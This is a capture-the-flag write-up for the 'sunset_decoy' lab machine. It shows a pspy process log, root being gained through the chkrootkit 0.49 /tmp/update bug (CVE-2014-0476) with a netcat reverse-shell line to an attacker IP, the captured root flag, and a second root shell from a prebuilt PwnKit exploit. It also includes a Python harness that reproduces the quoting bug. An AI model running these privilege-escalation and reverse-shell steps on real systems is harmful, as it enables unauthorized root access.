▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2020/06/27 18:56:57 CMD: UID=0 PID=9 |
2020/06/27 18:56:57 CMD: UID=0 PID=8 |
2020/06/27 18:56:57 CMD: UID=1000 PID=7659 | /bin/bash
2020/06/27 18:56:57 CMD: UID=1000 PID=7658 | python -c import pty;pty.spawn('/bin/bash')
2020/06/27 18:56:57 CMD: UID=1000 PID=7657 | /bin/sh -i
2020/06/27 18:56:57 CMD: UID=1000 PID=7653 | sh -c uname -a; w; id; /bin/sh -i
2020/06/27 18:56:57 CMD: UID=1000 PID=7652 | php -S 0.0.0.0:8080
2020/06/27 18:56:57 CMD: UID=1000 PID=7645 | php -S 0.0.0.0:8080
2020/06/27 18:56:57 CMD: UID=0 PID=6 |
2020/06/27 18:56:57 CMD: UID=0 PID=59 |
2020/06/27 18:56:57 CMD: UID=0 PID=50 |
2020/06/27 18:56:57 CMD: UID=0 PID=49 |
2020/06/27 18:56:57 CMD: UID=0 PID=481 | -bash
2020/06/27 18:56:57 CMD: UID=0 PID=48 |
2020/06/27 18:56:57 CMD: UID=0 PID=471 | (sd-pam)
2020/06/27 18:56:57 CMD: UID=0 PID=470 | /lib/systemd/systemd --user
2020/06/27 18:56:57 CMD: UID=0 PID=467 | sshd: root@pts/0
2020/06/27 18:56:57 CMD: UID=0 PID=424 | /usr/sbin/sshd -D
2020/06/27 18:56:57 CMD: UID=0 PID=423 | /sbin/agetty -o -p -- \u --noclear tty1 linux
2020/06/27 18:56:57 CMD: UID=0 PID=422 | /usr/sbin/cups-browsed
2020/06/27 18:56:57 CMD: UID=107 PID=420 | avahi-daemon: chroot helper
2020/06/27 18:56:57 CMD: UID=0 PID=402 | /usr/sbin/cupsd -l
2020/06/27 18:56:57 CMD: UID=0 PID=401 | /sbin/wpa_supplicant -u -s -O /run/wpa_supplicant
2020/06/27 18:56:57 CMD: UID=104 PID=400 | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
2020/06/27 18:56:57 CMD: UID=0 PID=4 |
2020/06/27 18:56:57 CMD: UID=0 PID=399 | /usr/sbin/cron -f
2020/06/27 18:56:57 CMD: UID=0 PID=398 | /lib/systemd/systemd-logind
2020/06/27 18:56:57 CMD: UID=107 PID=396 | avahi-daemon: running [60832e9f188106ec5bcc4eb7709ce592.local]
2020/06/27 18:56:57 CMD: UID=0 PID=395 | /usr/sbin/rsyslogd -n -iNONE
2020/06/27 18:56:57 CMD: UID=0 PID=390 | /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3
2020/06/27 18:56:57 CMD: UID=0 PID=30 |
2020/06/27 18:56:57 CMD: UID=0 PID=3 |
2020/06/27 18:56:57 CMD: UID=0 PID=294 |
2020/06/27 18:56:57 CMD: UID=0 PID=292 |
2020/06/27 18:56:57 CMD: UID=0 PID=29 |
2020/06/27 18:56:57 CMD: UID=0 PID=28 |
2020/06/27 18:56:57 CMD: UID=0 PID=27 |
2020/06/27 18:56:57 CMD: UID=0 PID=26 |
2020/06/27 18:56:57 CMD: UID=101 PID=255 | /lib/systemd/systemd-timesyncd
2020/06/27 18:56:57 CMD: UID=0 PID=25 |
2020/06/27 18:56:57 CMD: UID=0 PID=245 | /lib/systemd/systemd-udevd
2020/06/27 18:56:57 CMD: UID=0 PID=24 |
2020/06/27 18:56:57 CMD: UID=0 PID=23 |
2020/06/27 18:56:57 CMD: UID=0 PID=222 | /lib/systemd/systemd-journald
2020/06/27 18:56:57 CMD: UID=0 PID=22 |
2020/06/27 18:56:57 CMD: UID=0 PID=21 |
2020/06/27 18:56:57 CMD: UID=0 PID=20 |
2020/06/27 18:56:57 CMD: UID=0 PID=2 |
2020/06/27 18:56:57 CMD: UID=0 PID=190 |
2020/06/27 18:56:57 CMD: UID=0 PID=19 |
2020/06/27 18:56:57 CMD: UID=0 PID=189 |
2020/06/27 18:56:57 CMD: UID=0 PID=187 |
2020/06/27 18:56:57 CMD: UID=0 PID=18 |
2020/06/27 18:56:57 CMD: UID=0 PID=17 |
2020/06/27 18:56:57 CMD: UID=0 PID=16 |
2020/06/27 18:56:57 CMD: UID=0 PID=153 |
2020/06/27 18:56:57 CMD: UID=0 PID=15 |
2020/06/27 18:56:57 CMD: UID=0 PID=14 |
2020/06/27 18:56:57 CMD: UID=0 PID=12378 | ./pspy
2020/06/27 18:56:57 CMD: UID=0 PID=12356 |
2020/06/27 18:56:57 CMD: UID=0 PID=12299 | -bash
2020/06/27 18:56:57 CMD: UID=0 PID=12293 | sshd: root@pts/2
2020/06/27 18:56:57 CMD: UID=0 PID=12275 |
2020/06/27 18:56:57 CMD: UID=0 PID=12248 |
2020/06/27 18:56:57 CMD: UID=0 PID=12247 |
2020/06/27 18:56:57 CMD: UID=0 PID=12178 |
2020/06/27 18:56:57 CMD: UID=0 PID=12121 |
2020/06/27 18:56:57 CMD: UID=0 PID=12 |
2020/06/27 18:56:57 CMD: UID=0 PID=112 |
2020/06/27 18:56:57 CMD: UID=0 PID=110 |
2020/06/27 18:56:57 CMD: UID=0 PID=11 |
2020/06/27 18:56:57 CMD: UID=0 PID=108 |
2020/06/27 18:56:57 CMD: UID=0 PID=107 |
2020/06/27 18:56:57 CMD: UID=0 PID=105 |
2020/06/27 18:56:57 CMD: UID=0 PID=104 |
2020/06/27 18:56:57 CMD: UID=0 PID=102 |
2020/06/27 18:56:57 CMD: UID=0 PID=10 |
2020/06/27 18:56:57 CMD: UID=0 PID=1 | /sbin/init
2020/06/27 18:56:58 CMD: UID=0 PID=12385 | -bash
2020/06/27 18:56:58 CMD: UID=0 PID=12386 | tar -xvzf chkrootkit-0.49.tar.gz
2020/06/27 18:57:04 CMD: UID=0 PID=12389 | -bash
2020/06/27 18:57:04 CMD: UID=0 PID=12390 | -bash
2020/06/27 18:57:04 CMD: UID=0 PID=12391 | -bash
2020/06/27 18:57:05 CMD: UID=0 PID=12392 | -bash
2020/06/27 18:57:05 CMD: UID=0 PID=12393 | -bash
2020/06/27 18:57:06 CMD: UID=0 PID=12394 | -bash
2020/06/27 18:57:06 CMD: UID=0 PID=12395 | -bash
2020/06/27 18:57:06 CMD: UID=0 PID=12396 | -bash
2020/06/27 18:57:06 CMD: UID=0 PID=12397 | -bash
2020/06/27 18:57:06 CMD: UID=0 PID=12398 | -bash
2020/06/27 18:57:06 CMD: UID=0 PID=12399 | -bash
2020/06/27 18:57:07 CMD: UID=0 PID=12400 | -bash
2020/06/27 18:57:07 CMD: UID=0 PID=12401 | -bash
2020/06/27 18:57:07 CMD: UID=0 PID=12402 | -bash
2020/06/27 18:57:07 CMD: UID=0 PID=12403 | -bash
Exiting program... (interrupt)

My initial information gathering here was not careful enough. Two key facts can be pulled out of this file:

  • chkrootkit-0.49.tar.gz: root unpacked a software tarball whose name includes its version number
  • the log was produced by pspy, a process monitor, so it records what root was running on the box

chkrootkit privilege-escalation vulnerability

At first I only thought of locating the chkrootkit installation, found nothing (it is most likely under /root, which we cannot read) and gave up. I overlooked the version number; that should have prompted a search for known vulnerabilities in that exact version:

┌──(kali㉿kali)-[~/Downloads/sunset_decoy/etc]
└─$ searchsploit chkrootkit
---------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------- ---------------------------------
Chkrootkit - Local Privilege Escalation (Metasploit) | linux/local/38775.rb
Chkrootkit 0.49 - Local Privilege Escalation | linux/local/33899.txt
---------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

The advisory (EDB 33899, CVE-2014-0476) requires chkrootkit to be run as root: chkrootkit 0.49 executes a file named /tmp/update, if one exists, with its own privileges. honeypot.decoy runs as our unprivileged user, so it cannot be the privileged part by itself; but its message that the AV scan "will be launched in a minute or less" implies a periodic root-owned job performs the scan, and chkrootkit is evidently that "AV".
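
To see why planting /tmp/update works, here is an added example (not chkrootkit's own code) that reproduces the bug class behind EDB 33899 / CVE-2014-0476. In chkrootkit 0.49's slapper() check the list of suspicious paths is assembled with the unquoted assignment `file_port=$file_port $i`, which the shell parses as "run the command $i with file_port= in its environment", so the first listed file that exists, /tmp/update among them, is executed with the scanner's privileges. The harness below writes a marker-dropping stand-in for the payload into a scratch directory and runs both the vulnerable loop and the correctly quoted loop under /bin/sh; the path list, the marker and the loop body are constructed for the example and only mimic the scanner's pattern.

```python
"""Reproduce the shell-quoting bug behind the chkrootkit 0.49 advisory.

Added example, not chkrootkit's source. Runs a loop modelled on the
scanner's slapper() check under /bin/sh, once with the unquoted
assignment and once with the quoted fix, and reports whether the
planted "update" file was executed.
"""
import os
import subprocess
import tempfile

VULNERABLE_LOOP = 'file_port=$file_port $i'   # BUG: parsed as `file_port= $i`, i.e. runs $i
FIXED_LOOP = 'file_port="$file_port $i"'       # quoted: a plain string append

# Constructed stand-in for the scanner's loop; $1 is the scratch directory.
SCAN_TEMPLATE = """\
file_port=
for i in "$1/.bugtraq" "$1/httpd" "$1/update"; do
    if [ -f "$i" ]; then
        {assignment}
    fi
done
printf '%s' "$file_port"
"""


def run_scan(assignment: str) -> dict:
    """Run one variant of the loop; report whether the planted file executed."""
    with tempfile.TemporaryDirectory() as scratch:
        marker = os.path.join(scratch, "payload_ran")
        update = os.path.join(scratch, "update")
        with open(update, "w") as f:  # stand-in for /tmp/update: just drops a marker
            f.write(f'#!/bin/sh\ntouch "{marker}"\n')
        os.chmod(update, 0o755)       # the advisory requires the payload to be executable
        proc = subprocess.run(
            ["/bin/sh", "-c", SCAN_TEMPLATE.format(assignment=assignment), "scan", scratch],
            capture_output=True, text=True, check=True,
        )
        return {"payload_ran": os.path.exists(marker), "file_port": proc.stdout}


if __name__ == "__main__":
    for label, assignment in (("vulnerable", VULNERABLE_LOOP), ("fixed", FIXED_LOOP)):
        print(label, run_scan(assignment))
```

With the unquoted form the payload runs and file_port stays empty (the assignment was only a temporary environment entry for that command); with the quoted form nothing is executed and file_port accumulates the path as intended. Run as root from cron, the unquoted form is a root shell for whoever can write /tmp/update.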

Follow the advisory's steps: plant /tmp/update, trigger the scan, and wait for the callback. Two caveats: the advisory requires /tmp/update to be executable (the transcript below shows no chmod, so add `chmod +x /tmp/update` to be safe), and the payload relies on the target's netcat supporting -e, which this box's does.

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/tmp$ echo "/usr/bin/nc -e /bin/sh 192.168.56.106 4444" > /tmp/update
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/tmp$ cat update
/usr/bin/nc -e /bin/sh 192.168.56.106 4444
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/tmp$ ~/honeypot.decoy
--------------------------------------------------

Welcome to the Honey Pot administration manager (HPAM). Please select an option.
1 Date.
2 Calendar.
3 Shutdown.
4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.

Option selected:5

The AV Scan will be launched in a minute or less.
--------------------------------------------------
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/tmp$

The reverse shell comes back as root. The files in /root confirm the mechanism: script.sh checks for the /dev/shm/STTY5246 marker and, if present, runs /root/chkrootkit-0.49/chkrootkit, evidently from a root-owned scheduled job that is not visible in /etc/crontab.

┌──(kali㉿kali)-[~/Downloads/sunset_decoy/etc]
└─$ sudo nc -lvnp 4444
[sudo] password for kali:
listening on [any] 4444 ...
connect to [192.168.56.106] from (UNKNOWN) [192.168.56.131] 56014
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
uname -a
Linux 60832e9f188106ec5bcc4eb7709ce592 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 08:00:27:0e:3c:2a brd ff:ff:ff:ff:ff:ff
inet 192.168.56.131/24 brd 192.168.56.255 scope global dynamic enp0s3
valid_lft 413sec preferred_lft 413sec
inet6 fe80::a00:27ff:fe0e:3c2a/64 scope link
valid_lft forever preferred_lft forever
cd root
ls
chkrootkit-0.49
chkrootkit-0.49.tar.gz
log.txt
pspy
root.txt
script.sh
cat script.sh
FILE=/dev/shm/STTY5246
if test -f "$FILE"; then
/root/chkrootkit-0.49/chkrootkit
else
echo "An AV scan will not be launched."
fi
cat root.txt
........::::::::::::.. .......|...............::::::::........
.:::::;;;;;;;;;;;:::::.... . \ | ../....::::;;;;:::::.......
. ........... / \\_ \ | / ...... . ........./\
...:::../\\_ ...... ..._/' \\\_ \###/ /\_ .../ \_....... _//
.::::./ \\\ _ .../\ /' \\\\#######// \/\ // \_ ....////
_/ \\\\ _/ \\\ / x \\\\###//// \//// \__ _/////
./ x \\\/ \/ x X \////// \/////
/ XxX \\/ XxX X //// x
-----XxX-------------|-------XxX-----------*--------|---*-----|------------X--
X _X * X ** ** x ** * X
_X _X x * x X_


1c203242ab4b4509233ca210d50d2cc5

Thanks for playing! - Felipe Winsnes (@whitecr0wz)

Other privilege-escalation attempts

Some other approaches I tried. First, SUID binaries:

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ find / -type f -perm -04000 -ls 2>/dev/null
134602 44 -rwsr-xr-x 1 root root 44440 Jul 27 2018 /usr/bin/newgrp
134749 64 -rwsr-xr-x 1 root root 63568 Jan 10 2019 /usr/bin/su
135085 36 -rwsr-xr-x 1 root root 34888 Jan 10 2019 /usr/bin/umount
150671 24 -rwsr-xr-x 1 root root 23288 Jan 15 2019 /usr/bin/pkexec
131132 44 -rwsr-xr-x 1 root root 44528 Jul 27 2018 /usr/bin/chsh
160068 156 -rwsr-xr-x 1 root root 157192 Feb 2 2020 /usr/bin/sudo
131136 64 -rwsr-xr-x 1 root root 63736 Jul 27 2018 /usr/bin/passwd
131134 84 -rwsr-xr-x 1 root root 84016 Jul 27 2018 /usr/bin/gpasswd
135083 52 -rwsr-xr-x 1 root root 51280 Jan 10 2019 /usr/bin/mount
131131 56 -rwsr-xr-x 1 root root 54096 Jul 27 2018 /usr/bin/chfn
150673 20 -rwsr-xr-x 1 root root 18888 Jan 15 2019 /usr/lib/policykit-1/polkit-agent-helper-1
268427 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
148942 428 -rwsr-xr-x 1 root root 436552 Jan 31 2020 /usr/lib/openssh/ssh-keysign
145624 52 -rwsr-xr-- 1 root messagebus 51184 Jun 9 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper

Among the SUID binaries, pkexec and polkit-agent-helper-1 stood out, so I checked whether they could be used to escalate. Used normally, pkexec simply asks for root's password, which we do not have:

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ pkexec honeypot.decoy
==== AUTHENTICATING FOR org.freedesktop.policykit.exec ===
Authentication is needed to run `./honeypot.decoy' as the super user
Authenticating as: root
Password:
polkit-agent-helper-1: pam_authenticate failed: Authentication failure
==== AUTHENTICATION FAILED ===
Error executing command as another user: Not authorized

This incident has been reported.

Checking scheduled tasks turned up nothing in /etc/crontab. Note that this only covers the system crontab: root's per-user crontab is not readable by an unprivileged user, so a root cron job can still exist, which is consistent with the periodic "AV scan" seen above.

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

Looking at the kernel and package versions instead: the pkexec binary dates from January 2019, long before the January 2022 fix, so CVE-2021-4034 (PwnKit, a local privilege escalation in pkexec) also works. A prebuilt exploit was transferred to /tmp beforehand (the transfer is not shown):

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/tmp$ chmod +x CVE-2021-4034 
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/tmp$ ./CVE-2021-4034
2023/07/19 09:24:40 CMDTOEXECUTE is empty fallback to default value
2023/07/19 09:24:40 Executing command sh
# whoami
root


Source: https://i3eg1nner.github.io/2023/07/8964cc7f97f4.html
Author: I3eg1nner
Published: 20 July 2023